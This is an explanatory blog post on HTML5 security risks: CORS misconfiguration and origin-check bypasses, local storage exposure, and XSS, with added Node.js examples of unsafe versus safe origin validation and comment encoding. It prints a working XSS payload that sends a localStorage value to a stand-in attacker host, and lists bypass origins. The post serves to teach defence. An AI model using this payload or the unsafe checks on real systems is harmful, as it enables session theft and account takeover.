HTML5, the fifth major version of the HTML standard, was published as a W3C Recommendation in 2014 and is slowly becoming more prevalent across the internet as browsers implement it and webpages are updated to use its new features. HTML is the technology at the basis of the web: it provides the structured content of a webpage, so text and images (and, with HTML5, video and audio) all appear as HTML markup. HTML5 attempts to bridge the gap left by older HTML standards, which did not natively support multimedia or offer extensive scripting APIs. Two features that arrived alongside it are CORS (Cross-Origin Resource Sharing) and local storage.
CORS came about because developers felt restricted by the same-origin policy (an essential concept in web application security) and needed a controlled way to relax it. The same-origin policy (SOP) is enforced by web browsers to stop script loaded from one origin (scheme, host and port) from reading content that belongs to another. For example, say you have your online banking open in one tab and then visit a malicious website in another. A script on the malicious site can still cause your browser to send requests to the bank (AJAX calls, which let a page exchange data with a server without reloading), but the SOP stops that script from reading the responses. Without it, the malicious site could read your account pages and act as you, which would allow it to steal your money.
CORS adds a way for a server to opt out of SOP restrictions for particular origins. The rules that permit cross-origin access are expressed in HTTP response headers. The main one is Access-Control-Allow-Origin, which names the origin allowed to read the response. If it is set to the wildcard value "*", any origin may read the response; browsers refuse to combine "*" with credentials, so the more dangerous pattern is a server that copies whatever Origin header it receives into Access-Control-Allow-Origin and also sends Access-Control-Allow-Credentials: true. Even when the header appears to be set to a specific site, weak origin validation can often be bypassed. For example, against a check intended to allow only www.government.com, an attacker could try origins such as wwwxgovernment.com (an unescaped dot in a regular expression), www.government.com.malicious.site (a prefix or "starts with" check), or the literal origin null (sent by sandboxed iframes and some redirects) and see whether any of them is accepted. If one is, and credentials are allowed, then a malicious site open in another tab can make AJAX requests to your bank from your browser, with your session cookies attached, and read the responses, and you would not be able to tell this was going on in the background. That could let the attacker act as you on your bank account and rob you of your hard-earned money, all because the developers did not implement CORS securely or validate the Origin value correctly.
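The three origin checks described above, as an added example that is not code from the original post. It is Node.js code; www.government.com is the hypothetical site name the post uses, the attacker origins are constructed probe inputs, and the header-building functions are illustrative rather than any particular framework's API. Two of the checks accept an attacker origin; the allow-list version does not.

```javascript
// Added example (not from the original post): three ways a server might decide
// whether to honour the Origin header on a CORS request, and why two of them
// are unsafe. The trusted site www.government.com is the hypothetical name
// used in the post; the attacker origins below are constructed test inputs.

const ALLOWED_ORIGINS = new Set([
  'https://www.government.com',
  'https://app.government.com',
]);

// Unsafe 1: regular expression with unescaped dots. "." matches any character,
// so https://wwwxgovernment.com is accepted.
function isAllowedRegex(origin) {
  return /^https:\/\/www.government.com$/.test(origin);
}

// Unsafe 2: prefix check. https://www.government.com.malicious.site starts with
// the trusted string, so it passes.
function isAllowedPrefix(origin) {
  return typeof origin === 'string' && origin.startsWith('https://www.government.com');
}

// Unsafe 3: reflect whatever Origin arrives and allow credentials. This is the
// configuration that lets a third-party page read a logged-in user's responses.
function reflectAnyOrigin(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Safe: exact match against a fixed allow-list, scheme included. Anything else,
// including the literal string "null", gets no CORS headers at all.
function corsHeadersFor(origin) {
  if (typeof origin !== 'string' || !ALLOWED_ORIGINS.has(origin)) {
    return {};
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    // Make shared caches key on Origin so one client's headers are not served to another.
    'Vary': 'Origin',
  };
}

// Constructed probe origins, in the style of the bypass attempts in the post.
const PROBES = [
  'https://www.government.com',
  'https://wwwxgovernment.com',
  'https://www.government.com.malicious.site',
  'null',
  'https://malicious.site',
];

// One row per probe: which checks would let that origin read responses.
function summary() {
  return PROBES.map((o) => ({
    origin: o,
    regex: isAllowedRegex(o),
    prefix: isAllowedPrefix(o),
    reflect: reflectAnyOrigin(o)['Access-Control-Allow-Origin'] === o,
    allowlist: Object.keys(corsHeadersFor(o)).length > 0,
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(summary());
}
```

Run it with node and the table shows the regex check accepting wwwxgovernment.com, the prefix check accepting www.government.com.malicious.site, the reflecting server accepting everything including null, and the allow-list accepting only the two listed origins. The Vary: Origin header matters in practice because a cache that stores a response with one client's Access-Control-Allow-Origin could otherwise replay it to another.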
Another feature introduced alongside HTML5 is local storage. Before it, data a website kept in the browser lived in cookies. Local storage offers far more space (several megabytes per origin instead of about 4 KB per cookie) and is not sent automatically with every request, but it is not more secure than cookies: there is no equivalent of the HttpOnly flag, so any script running on the origin can read all of it. Think of local storage as a small key-value database for website data in your browser. Different sites cannot read each other's local storage, because it is scoped to the origin, and CORS does not change that. However, the data can be reached through another vulnerability, XSS (cross-site scripting), which occurs when an attacker injects JavaScript into a web application that does not sanitize or encode user-supplied data.
For example, see the comment section at the bottom of this page? If an attacker typed a <script></script> tag into the comment box and the website did not sanitize or encode the data, the attacker's JavaScript would become part of the page. Whenever a visitor loaded the page, they would load the attacker's comment along with the script in it, which could steal session cookies (unless they are marked HttpOnly) or local storage data from that domain and send them to the attacker, who could then take control of the unsuspecting user's account. XSS does not bypass the SOP or CORS; it runs inside the vulnerable site's origin, so the browser grants it everything that site's own code could access. That makes XSS well suited to stealing data from local storage. Injecting this script does just that:
<script>document.write("<img src='http://attackersite.com?cookie="+localStorage.getItem('foo')+"'>");</script> // 'foo' is the local storage key to extract; its value is sent to the attacker-controlled domain as the query string of the image request
Also, anyone with access to the browser, or to the profile directory where it keeps its files on disk, has access to all local storage data, since it is stored unencrypted and persists until it is explicitly cleared. Likewise, if a victim's browser is hooked with BeEF, the attacker's script already runs inside the page and all local storage data for that origin can simply be extracted. For these reasons it is not recommended to store sensitive data such as session tokens in local storage.
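The comment-rendering bug described above, beside the fix, as an added example that is not code from the original post. It is Node.js code; the comment markup, the field names author and body, and the function names are assumptions made for illustration, and the injected payload is the one from the post reproduced as a constructed test input. The unsafe renderer drops the attacker's text straight into the page; the safe renderer HTML-encodes it on output so the script is displayed as text instead of executed.

```javascript
// Added example (not from the original post): rendering a user comment with and
// without output encoding. The markup and function names are hypothetical; the
// payload is the local storage exfiltration script shown in the post.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Encode every character that can break out of an HTML text node or a quoted
// attribute value. Encoding on output is what stops stored XSS; it does not
// matter what the comment looked like when it was saved.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user-controlled text interpolated straight into the markup.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Fixed: same template, both fields encoded when they are written to the page.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Crude check used only to illustrate the difference: would a browser see a
// live <script> start tag in this fragment?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed test input: the payload from the post, as an attacker would type it.
const EXFIL_PAYLOAD =
  `<script>document.write("<img src='http://attackersite.com?cookie="+localStorage.getItem('foo')+"'>");</script>`;

// Render the same comment both ways so the two results can be compared.
function demo() {
  const unsafe = renderCommentUnsafe('mallory', EXFIL_PAYLOAD);
  const safe = renderCommentSafe('mallory', EXFIL_PAYLOAD);
  return {
    unsafe,
    safe,
    unsafeExecutes: containsScriptTag(unsafe),
    safeExecutes: containsScriptTag(safe),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const result = demo();
  console.log('unsafe:', result.unsafe);
  console.log('safe:  ', result.safe);
  console.log('script tag survives? unsafe=%s safe=%s', result.unsafeExecutes, result.safeExecutes);
}
```

In the safe output the payload appears as &lt;script&gt;document.write(...)&lt;/script&gt;, which the browser shows as literal text. Note that this encoding is correct for HTML text and quoted attributes only; a value placed inside a script block, a URL, or an event handler attribute needs a different encoding for that context.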
Because most web vulnerabilities exist because developers implemented a site poorly, adding new features means that careless developers will inevitably create new attack vectors. That is great news for hackers, but unfortunately bad news for everybody else.
The post HTML5 Introduces New Security Threats! appeared first on Deep Dot Web.